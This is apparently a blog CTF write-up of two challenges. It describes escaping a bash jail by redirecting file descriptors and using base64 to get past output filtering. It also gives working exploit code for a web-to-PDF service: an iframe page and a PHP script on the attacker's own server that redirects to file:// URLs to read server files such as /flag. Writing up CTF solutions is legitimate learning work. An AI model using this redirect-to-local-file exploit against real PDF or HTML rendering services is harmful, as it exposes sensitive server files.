myBrokenBash
For this challenge, the author give us something about stdout and when I try to send something the server will reply the string that I send, it's make me remember to a challenge in Ringzer0 CTF about bash shell jail escaping. It use file description to bypass stdout. Redirect from stdout to stdin by ls * 1>&0 I can see the flag file.
But I got the problem when I try to cat a flag, I only have a half flag
Maybe another file contain another half flag but the grep command only direct me to that file, so I think it have been filtered output. After a little help form my mates, I used base64 command and got a flag.
Flag: INS{c@t_th3_Flag_1t_s_n0t_so_ea4y}
EZGEN
I write this writeup base on my mate solution, I just help him found flag's direction because I found it at mybashbroken. This challenge have problem is LFI and he wrote a code on his vps to get flag. The code below is just a old version because he reset windows after competion end so I can't have best code for you.
index.html
1 2 3 4 5 6 7 8 9 10 11 12 | <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title></title> <link rel="stylesheet" href=""> </head> <body> <iframe width="800" height="800" src="http://<IP_YOUR_SERVER>/file.php?file=/var/www/html/webtopdf.php"></iframe> </body> </html> |
file.php
The flag saved at /flag
1 2 3 4 | <?php $filename = $_GET['file']; header("Location: file://$filename"); ?> |
The flag saved at /flag
(This is my first test, correct is /flag not flag)
And I got flag
0 comments:
Post a Comment